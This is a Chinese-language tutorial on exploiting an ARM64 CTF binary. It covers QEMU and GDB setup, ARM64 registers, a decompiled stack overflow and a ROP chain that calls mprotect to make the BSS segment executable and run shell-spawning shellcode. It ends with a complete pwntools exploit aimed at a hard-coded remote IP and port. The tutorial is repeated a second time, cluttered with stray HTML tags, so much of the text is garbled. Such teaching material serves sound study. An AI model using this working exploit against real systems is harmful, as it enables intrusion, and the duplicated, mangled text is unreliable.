ARM64 调试环境搭建及 ROP 实战教学文档<\/h1>

一、环境准备<\/h2>

1.1 工具安装<\/h3>

# 安装交叉编译工具链和动态库<\/span>
<\/span><\/span>sudo apt-get install -y gcc-aarch64-linux-gnu g++-aarch64-linux-gnu
<\/span><\/span>
<\/span><\/span># 安装qemu模拟器<\/span>
<\/span><\/span>sudo apt-get install qemu-user
<\/span><\/span><\/code><\/pre>1.2 调试环境搭建<\/h3>
使用QEMU运行ARM64程序并开启调试服务：<\/p>
qemu-aarch64 -g 1234<\/span> -L \/usr\/aarch64-linux-gnu .\/pwn
<\/span><\/span><\/code><\/pre>参数说明：<\/p>

-g 1234<\/code>：在1234端口启动gdbserver<\/li>
-L \/usr\/aarch64-linux-gnu<\/code>：指定动态库路径<\/li>
<\/ul>
1.3 使用socat搭建远程调试环境<\/h3>
socat tcp-l:10002,fork exec:"qemu-aarch64 -g 1234 -L \/usr\/aarch64-linux-gnu .\/pwn"<\/span>,reuseaddr
<\/span><\/span><\/code><\/pre>二、ARM64基础<\/h2>
2.1 寄存器体系<\/h3>

32个64位通用寄存器：x0-x30 + sp<\/li>
32位模式使用w0-w30（低32位）<\/li>
特殊寄存器：

x29 (FP)：帧指针<\/li>
x30 (LR)：链接寄存器，保存返回地址<\/li>
SP：栈指针<\/li>
PC：程序计数器<\/li>
<\/ul>
<\/li>
<\/ul>
2.2 函数调用约定<\/h3>

前8个参数通过x0-x7传递<\/li>
返回值通过x0传递<\/li>
超过8个参数通过栈传递<\/li>
<\/ul>
2.3 关键指令<\/h3>



指令<\/th>
功能描述<\/th>
<\/tr>
<\/thead>


ret<\/code><\/td>
跳转到x30寄存器保存的地址<\/td>
<\/tr>

ldp x19, x20, [sp, #0x10]<\/code><\/td>
从sp+0x10读取16字节到x19和x20<\/td>
<\/tr>

ldp x29, x30, [sp], #0x40<\/code><\/td>
从sp读取16字节到x29和x30，然后sp+=0x40<\/td>
<\/tr>

MOV X1, X0<\/code><\/td>
寄存器间数据移动<\/td>
<\/tr>

blr x3<\/code><\/td>
跳转到x3指定的地址，同时保存下条指令到x30<\/td>
<\/tr>
<\/tbody>
<\/table>
三、程序分析<\/h2>
3.1 保护机制检查<\/h3>
checksec pwn
<\/span><\/span>[<\/span>*]<\/span> '\/home\/hac425\/workplace\/pwn'<\/span>
<\/span><\/span>    Arch:     aarch64-64-little
<\/span><\/span>    RELRO:    Partial RELRO
<\/span><\/span>    Stack:    No canary found
<\/span><\/span>    NX:       NX enabled
<\/span><\/span>    PIE:      No PIE (<\/span>0x400000)<\/span>
<\/span><\/span><\/code><\/pre>关键点：<\/p>

64位ARM架构<\/li>
开启NX（堆栈不可执行）<\/li>
无PIE（基地址固定）<\/li>
无栈保护<\/li>
<\/ul>
3.2 漏洞分析<\/h3>
__int64<\/span> sub_400818<\/span>() {
<\/span><\/span>    sub_400760();
<\/span><\/span>    write(1LL<\/span>, "Name:"<\/span>, 5LL<\/span>);
<\/span><\/span>    read(0LL<\/span>, &<\/span>unk_411068, 0x200LL<\/span>); \/\/ BSS段读入0x200字节
<\/span><\/span><\/span><\/span>    sub_4007F0();
<\/span><\/span>    return<\/span> 0LL<\/span>;
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>__int64<\/span> sub_4007F0<\/span>() {
<\/span><\/span>    __int64<\/span> v1; \/\/ 8字节变量
<\/span><\/span><\/span><\/span>    return<\/span> read(0LL<\/span>, &<\/span>v1, 512LL<\/span>); \/\/ 栈溢出漏洞
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>漏洞点：<\/p>

可以向BSS段（0x411068）写入0x200字节数据<\/li>
sub_4007F0函数存在栈溢出（8字节变量读入512字节）<\/li>
<\/ol>
四、ROP利用<\/h2>
4.1 利用思路<\/h3>

利用第一次输入在BSS段布置shellcode<\/li>
通过栈溢出构造ROP链<\/li>
调用mprotect使BSS段可执行<\/li>
跳转到shellcode执行<\/li>
<\/ol>
4.2 偏移计算<\/h3>
使用cyclic模式确定溢出偏移：<\/p>
from<\/span> pwn import<\/span> *<\/span>
<\/span><\/span>payload =<\/span> cyclic(0x200<\/span>)
<\/span><\/span><\/code><\/pre>崩溃后查看PC寄存器值，使用cyclic_find<\/code>计算偏移：<\/p>
cyclic_find(0x61616173<\/span>)  # 结果为72<\/span>
<\/span><\/span><\/code><\/pre>结论：偏移为72字节<\/p>
4.3 Gadget搜索与分析<\/h3>
使用ROPgadget工具：<\/p>
ROPgadget --binary pwn > pwn.txt
<\/span><\/span><\/code><\/pre>关键gadget：<\/p>

Gadget 1 (0x4008CC)<\/strong>:<\/li>
<\/ol>
ldp x19, x20, [sp, #0x10]
ldp x21, x22, [sp, #0x20] 
ldp x23, x24, [sp, #0x30]
ldp x29, x30, [sp], #0x40
ret
<\/code><\/pre>

Gadget 2 (0x4008AC)<\/strong>:<\/li>
<\/ol>
ldr x3, [x21, x19, lsl #3]
mov x2, x22
mov x1, x23
mov w0, w24
add x19, x19, #1
blr x3
<\/code><\/pre>
4.4 ROP链构造<\/h3>
利用这两个gadget可以：<\/p>

通过Gadget 1设置寄存器值<\/li>
通过Gadget 2准备函数参数并跳转<\/li>
<\/ol>
具体布局：<\/p>
payload =<\/span> cyclic(72<\/span>)  # 填充<\/span>
<\/span><\/span>payload +=<\/span> p64(0x4008CC<\/span>)  # Gadget 1<\/span>
<\/span><\/span>payload +=<\/span> p64(0x0<\/span>)  # x29<\/span>
<\/span><\/span>payload +=<\/span> p64(0x4008AC<\/span>)  # x30 (Gadget 2)<\/span>
<\/span><\/span>payload +=<\/span> p64(0x0<\/span>)  # x19<\/span>
<\/span><\/span>payload +=<\/span> p64(0x0<\/span>)  # x20<\/span>
<\/span><\/span>payload +=<\/span> p64(0x0411068<\/span>)  # x21 (BSS地址)<\/span>
<\/span><\/span>payload +=<\/span> p64(0x7<\/span>)  # x22 (PROT_READ|PROT_WRITE|PROT_EXEC)<\/span>
<\/span><\/span>payload +=<\/span> p64(0x1000<\/span>)  # x23 (size)<\/span>
<\/span><\/span>payload +=<\/span> p64(0x411000<\/span>)  # x24 (address)<\/span>
<\/span><\/span>payload +=<\/span> p64(0x0411068<\/span> +<\/span> 0x10<\/span>)  # 返回地址1<\/span>
<\/span><\/span>payload +=<\/span> p64(0x0411068<\/span> +<\/span> 0x10<\/span>)  # 返回地址2 (跳转到shellcode)<\/span>
<\/span><\/span><\/code><\/pre>4.5 Shellcode布置<\/h3>
第一次输入时在BSS段布置shellcode：<\/p>
p.<\/span>recvuntil("Name:"<\/span>)
<\/span><\/span>payload =<\/span> p64(0x4007E0<\/span>)  # mprotect调用地址<\/span>
<\/span><\/span>payload +=<\/span> p64(0<\/span>)  # 填充<\/span>
<\/span><\/span>payload +=<\/span> asm(shellcraft.<\/span>aarch64.<\/span>sh())  # shellcode<\/span>
<\/span><\/span>p.<\/span>send(payload)
<\/span><\/span><\/code><\/pre>五、完整利用代码<\/h2>
from<\/span> pwn import<\/span> *<\/span>
<\/span><\/span>from<\/span> time import<\/span> sleep
<\/span><\/span>
<\/span><\/span>elf =<\/span> ELF(".\/pwn"<\/span>)
<\/span><\/span>context.<\/span>binary =<\/span> elf
<\/span><\/span>context.<\/span>log_level =<\/span> "debug"<\/span>
<\/span><\/span>
<\/span><\/span>shellcode =<\/span> asm(shellcraft.<\/span>aarch64.<\/span>sh())
<\/span><\/span>
<\/span><\/span># p = remote("127.0.0.1", 10002)<\/span>
<\/span><\/span>p =<\/span> remote("106.75.126.171"<\/span>, 33865<\/span>)
<\/span><\/span># pause()<\/span>
<\/span><\/span>
<\/span><\/span>p.<\/span>recvuntil("Name:"<\/span>)
<\/span><\/span>payload =<\/span> p64(0x4007E0<\/span>)  # mprotect调用地址<\/span>
<\/span><\/span>payload +=<\/span> p64(0<\/span>)  # 填充<\/span>
<\/span><\/span>payload +=<\/span> shellcode
<\/span><\/span>p.<\/span>send(payload)
<\/span><\/span>
<\/span><\/span>payload =<\/span> cyclic(72<\/span>)
<\/span><\/span>payload +=<\/span> p64(0x4008CC<\/span>)  # Gadget 1<\/span>
<\/span><\/span>payload +=<\/span> p64(0x0<\/span>)  # x29<\/span>
<\/span><\/span>payload +=<\/span> p64(0x4008AC<\/span>)  # x30 (Gadget 2)<\/span>
<\/span><\/span>payload +=<\/span> p64(0x0<\/span>)  # x19<\/span>
<\/span><\/span>payload +=<\/span> p64(0x0<\/span>)  # x20<\/span>
<\/span><\/span>payload +=<\/span> p64(0x0411068<\/span>)  # x21 (BSS地址)<\/span>
<\/span><\/span>payload +=<\/span> p64(0x7<\/span>)  # x22 (PROT_READ|PROT_WRITE|PROT_EXEC)<\/span>
<\/span><\/span>payload +=<\/span> p64(0x1000<\/span>)  # x23 (size)<\/span>
<\/span><\/span>payload +=<\/span> p64(0x411000<\/span>)  # x24 (address)<\/span>
<\/span><\/span>payload +=<\/span> p64(0x0411068<\/span> +<\/span> 0x10<\/span>)  # 返回地址1<\/span>
<\/span><\/span>payload +=<\/span> p64(0x0411068<\/span> +<\/span> 0x10<\/span>)  # 返回地址2 (跳转到shellcode)<\/span>
<\/span><\/span>payload +=<\/span> cyclic(0x100<\/span>)
<\/span><\/span>
<\/span><\/span>sleep(0.5<\/span>)
<\/span><\/span>p.<\/span>sendline(payload)
<\/span><\/span>p.<\/span>interactive()
<\/span><\/span><\/code><\/pre>六、总结与扩展<\/h2>
6.1 关键点总结<\/h3>


ARM64架构特点：<\/p>

寄存器使用方式<\/li>
函数调用约定<\/li>
常见指令功能<\/li>
<\/ul>
<\/li>

调试技巧：<\/p>

QEMU+GDB调试ARM程序<\/li>
使用socat创建调试环境<\/li>
cyclic模式确定偏移<\/li>
<\/ul>
<\/li>

ROP构造：<\/p>

多gadget组合使用<\/li>
寄存器控制技巧<\/li>
内存权限修改方法<\/li>
<\/ul>
<\/li>
<\/ol>
6.2 扩展知识<\/h3>


mprotect参数：<\/p>

PROT_READ (0x1)<\/li>
PROT_WRITE (0x2)<\/li>
PROT_EXEC (0x4)<\/li>
PROT_NONE (0x0)<\/li>
<\/ul>
<\/li>

通用gadget特征：<\/p>

位于程序初始化部分<\/li>
包含多个寄存器操作<\/li>
有清晰的栈操作模式<\/li>
<\/ul>
<\/li>

其他架构调试：<\/p>

类似方法可用于MIPS、PowerPC等架构<\/li>
apt安装对应架构的库文件<\/li>
使用qemu-*系列工具运行<\/li>
<\/ul>
<\/li>
<\/ol>

指令<\/th>	功能描述<\/th> <\/tr> <\/thead>
`ret<\/code><\/td>`	跳转到x30寄存器保存的地址<\/td> <\/tr>
`ldp x19, x20, [sp, #0x10]<\/code><\/td>`	从sp+0x10读取16字节到x19和x20<\/td> <\/tr>
`ldp x29, x30, [sp], #0x40<\/code><\/td>`	从sp读取16字节到x29和x30，然后sp+=0x40<\/td> <\/tr>
`MOV X1, X0<\/code><\/td>`	寄存器间数据移动<\/td> <\/tr>
`blr x3<\/code><\/td>`	跳转到x3指定的地址，同时保存下条指令到x30<\/td> <\/tr> <\/tbody> <\/table> 三、程序分析<\/h2> 3.1 保护机制检查<\/h3> checksec pwn <\/span><\/span>[<\/span>]<\/span> '\/home\/hac425\/workplace\/pwn'<\/span> <\/span><\/span> Arch: aarch64-64-little <\/span><\/span> RELRO: Partial RELRO <\/span><\/span> Stack: No canary found <\/span><\/span> NX: NX enabled <\/span><\/span> PIE: No PIE (<\/span>0x400000)<\/span> <\/span><\/span><\/code><\/pre>关键点：<\/p> 64位ARM架构<\/li> 开启NX（堆栈不可执行）<\/li> 无PIE（基地址固定）<\/li> 无栈保护<\/li> <\/ul> 3.2 漏洞分析<\/h3> __int64<\/span> sub_400818<\/span>() { <\/span><\/span> sub_400760(); <\/span><\/span> write(1LL<\/span>, "Name:"<\/span>, 5LL<\/span>); <\/span><\/span> read(0LL<\/span>, &<\/span>unk_411068, 0x200LL<\/span>); \/\/ BSS段读入0x200字节 <\/span><\/span><\/span><\/span> sub_4007F0(); <\/span><\/span> return<\/span> 0LL<\/span>; <\/span><\/span>} <\/span><\/span> <\/span><\/span>__int64<\/span> sub_4007F0<\/span>() { <\/span><\/span> __int64<\/span> v1; \/\/ 8字节变量 <\/span><\/span><\/span><\/span> return<\/span> read(0LL<\/span>, &<\/span>v1, 512LL<\/span>); \/\/ 栈溢出漏洞 <\/span><\/span><\/span><\/span>} <\/span><\/span><\/code><\/pre>漏洞点：<\/p> 可以向BSS段（0x411068）写入0x200字节数据<\/li> sub_4007F0函数存在栈溢出（8字节变量读入512字节）<\/li> <\/ol> 四、ROP利用<\/h2> 4.1 利用思路<\/h3> 利用第一次输入在BSS段布置shellcode<\/li> 通过栈溢出构造ROP链<\/li> 调用mprotect使BSS段可执行<\/li> 跳转到shellcode执行<\/li> <\/ol> 4.2 偏移计算<\/h3> 使用cyclic模式确定溢出偏移：<\/p> from<\/span> pwn import<\/span> <\/span> <\/span><\/span>payload =<\/span> cyclic(0x200<\/span>) <\/span><\/span><\/code><\/pre>崩溃后查看PC寄存器值，使用cyclic_find<\/code>计算偏移：<\/p> cyclic_find(0x61616173<\/span>) # 结果为72<\/span> <\/span><\/span><\/code><\/pre>结论：偏移为72字节<\/p> 4.3 Gadget搜索与分析<\/h3> 使用ROPgadget工具：<\/p> ROPgadget --binary pwn > pwn.txt <\/span><\/span><\/code><\/pre>关键gadget：<\/p> Gadget 1 (0x4008CC)<\/strong>:<\/li> <\/ol> ldp x19, x20, [sp, #0x10] ldp x21, x22, [sp, #0x20] ldp x23, x24, [sp, #0x30] ldp x29, x30, [sp], #0x40 ret <\/code><\/pre> Gadget 2 (0x4008AC)<\/strong>:<\/li> <\/ol> ldr x3, [x21, x19, lsl #3] mov x2, x22 mov x1, x23 mov w0, w24 add x19, x19, #1 blr x3 <\/code><\/pre> 4.4 ROP链构造<\/h3> 利用这两个gadget可以：<\/p> 通过Gadget 1设置寄存器值<\/li> 通过Gadget 2准备函数参数并跳转<\/li> <\/ol> 具体布局：<\/p> payload =<\/span> cyclic(72<\/span>) # 填充<\/span> <\/span><\/span>payload +=<\/span> p64(0x4008CC<\/span>) # Gadget 1<\/span> <\/span><\/span>payload +=<\/span> p64(0x0<\/span>) # x29<\/span> <\/span><\/span>payload +=<\/span> p64(0x4008AC<\/span>) # x30 (Gadget 2)<\/span> <\/span><\/span>payload +=<\/span> p64(0x0<\/span>) # x19<\/span> <\/span><\/span>payload +=<\/span> p64(0x0<\/span>) # x20<\/span> <\/span><\/span>payload +=<\/span> p64(0x0411068<\/span>) # x21 (BSS地址)<\/span> <\/span><\/span>payload +=<\/span> p64(0x7<\/span>) # x22 (PROT_READ\|PROT_WRITE\|PROT_EXEC)<\/span> <\/span><\/span>payload +=<\/span> p64(0x1000<\/span>) # x23 (size)<\/span> <\/span><\/span>payload +=<\/span> p64(0x411000<\/span>) # x24 (address)<\/span> <\/span><\/span>payload +=<\/span> p64(0x0411068<\/span> +<\/span> 0x10<\/span>) # 返回地址1<\/span> <\/span><\/span>payload +=<\/span> p64(0x0411068<\/span> +<\/span> 0x10<\/span>) # 返回地址2 (跳转到shellcode)<\/span> <\/span><\/span><\/code><\/pre>4.5 Shellcode布置<\/h3> 第一次输入时在BSS段布置shellcode：<\/p> p.<\/span>recvuntil("Name:"<\/span>) <\/span><\/span>payload =<\/span> p64(0x4007E0<\/span>) # mprotect调用地址<\/span> <\/span><\/span>payload +=<\/span> p64(0<\/span>) # 填充<\/span> <\/span><\/span>payload +=<\/span> asm(shellcraft.<\/span>aarch64.<\/span>sh()) # shellcode<\/span> <\/span><\/span>p.<\/span>send(payload) <\/span><\/span><\/code><\/pre>五、完整利用代码<\/h2> from<\/span> pwn import<\/span> <\/span> <\/span><\/span>from<\/span> time import<\/span> sleep <\/span><\/span> <\/span><\/span>elf =<\/span> ELF(".\/pwn"<\/span>) <\/span><\/span>context.<\/span>binary =<\/span> elf <\/span><\/span>context.<\/span>log_level =<\/span> "debug"<\/span> <\/span><\/span> <\/span><\/span>shellcode =<\/span> asm(shellcraft.<\/span>aarch64.<\/span>sh()) <\/span><\/span> <\/span><\/span># p = remote("127.0.0.1", 10002)<\/span> <\/span><\/span>p =<\/span> remote("106.75.126.171"<\/span>, 33865<\/span>) <\/span><\/span># pause()<\/span> <\/span><\/span> <\/span><\/span>p.<\/span>recvuntil("Name:"<\/span>) <\/span><\/span>payload =<\/span> p64(0x4007E0<\/span>) # mprotect调用地址<\/span> <\/span><\/span>payload +=<\/span> p64(0<\/span>) # 填充<\/span> <\/span><\/span>payload +=<\/span> shellcode <\/span><\/span>p.<\/span>send(payload) <\/span><\/span> <\/span><\/span>payload =<\/span> cyclic(72<\/span>) <\/span><\/span>payload +=<\/span> p64(0x4008CC<\/span>) # Gadget 1<\/span> <\/span><\/span>payload +=<\/span> p64(0x0<\/span>) # x29<\/span> <\/span><\/span>payload +=<\/span> p64(0x4008AC<\/span>) # x30 (Gadget 2)<\/span> <\/span><\/span>payload +=<\/span> p64(0x0<\/span>) # x19<\/span> <\/span><\/span>payload +=<\/span> p64(0x0<\/span>) # x20<\/span> <\/span><\/span>payload +=<\/span> p64(0x0411068<\/span>) # x21 (BSS地址)<\/span> <\/span><\/span>payload +=<\/span> p64(0x7<\/span>) # x22 (PROT_READ\|PROT_WRITE\|PROT_EXEC)<\/span> <\/span><\/span>payload +=<\/span> p64(0x1000<\/span>) # x23 (size)<\/span> <\/span><\/span>payload +=<\/span> p64(0x411000<\/span>) # x24 (address)<\/span> <\/span><\/span>payload +=<\/span> p64(0x0411068<\/span> +<\/span> 0x10<\/span>) # 返回地址1<\/span> <\/span><\/span>payload +=<\/span> p64(0x0411068<\/span> +<\/span> 0x10<\/span>) # 返回地址2 (跳转到shellcode)<\/span> <\/span><\/span>payload +=<\/span> cyclic(0x100<\/span>) <\/span><\/span> <\/span><\/span>sleep(0.5<\/span>) <\/span><\/span>p.<\/span>sendline(payload) <\/span><\/span>p.<\/span>interactive() <\/span><\/span><\/code><\/pre>六、总结与扩展<\/h2> 6.1 关键点总结<\/h3> ARM64架构特点：<\/p> 寄存器使用方式<\/li> 函数调用约定<\/li> 常见指令功能<\/li> <\/ul> <\/li> 调试技巧：<\/p> QEMU+GDB调试ARM程序<\/li> 使用socat创建调试环境<\/li> cyclic模式确定偏移<\/li> <\/ul> <\/li> ROP构造：<\/p> 多gadget组合使用<\/li> 寄存器控制技巧<\/li> 内存权限修改方法<\/li> <\/ul> <\/li> <\/ol> 6.2 扩展知识<\/h3> mprotect参数：<\/p> PROT_READ (0x1)<\/li> PROT_WRITE (0x2)<\/li> PROT_EXEC (0x4)<\/li> PROT_NONE (0x0)<\/li> <\/ul> <\/li> 通用gadget特征：<\/p> 位于程序初始化部分<\/li> 包含多个寄存器操作<\/li> 有清晰的栈操作模式<\/li> <\/ul> <\/li> 其他架构调试：<\/p> 类似方法可用于MIPS、PowerPC等架构<\/li> apt安装对应架构的库文件<\/li> 使用qemu-系列工具运行<\/li> <\/ul> <\/li> <\/ol>